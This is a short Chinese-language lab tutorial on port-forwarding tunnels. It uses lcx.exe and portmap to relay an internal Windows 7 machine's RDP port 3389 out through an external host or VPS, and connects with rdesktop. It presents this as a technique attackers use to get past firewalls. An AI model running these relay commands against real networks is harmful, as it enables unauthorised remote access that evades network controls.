环境准备
名字 | IP地址 | 内/外网 |
---|---|---|
Infogather | 192.168.1.151 | 外网 |
VPS | 192.168.1.129 | 外网 |
Win7 | 10.0.1.4 | 内网 |
Windows平台(Lcx)
- 外网Infogather机器运行以下如图的命令,把3333端口转发到自己的2222端口
Lcx.exe -listen 3333 2222
内网的Win7运行以下如图的命令
Lcx.exe -slave 192.168.1.151(转发的目标地址) 3333(转发的目标端口) 10.0.1.4(本机的ip地址) 3389
VPS连接Infogather的2222端口,连接成功,如图所示
rdesktop 192.168.1.151:2222
Linux平台(portmap)
portmap的命令:
Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2
- VPS先开启如图所示的命令,把192.168.1.129:3333端口的流量转发到本机2222端口
./portmap -m 2 -p1 2222 -h2 192.168.1.129 -p2 3333
内网的Win7机器运行如图所示的命令,把内网10.0.1.4:3389端口转发到win7的3333端口中
Lcx.exe -slave 192.168.1.129 3333 10.0.1.4 3389
VPS开启远程访问,如图所示
rdesktop 192.168.1.129:2222
连接成功,如图所示
总结
传输层隧道技术有TCP、UDP和端口转发等,由于内网防火墙禁止外网访问内网的一些指定端口,如3389端口,因此攻击者就会利用端口转发的技术,来对目标机器进行端口转发,转发成一个不被防火墙禁止的端口,从而实现对防火墙的绕过。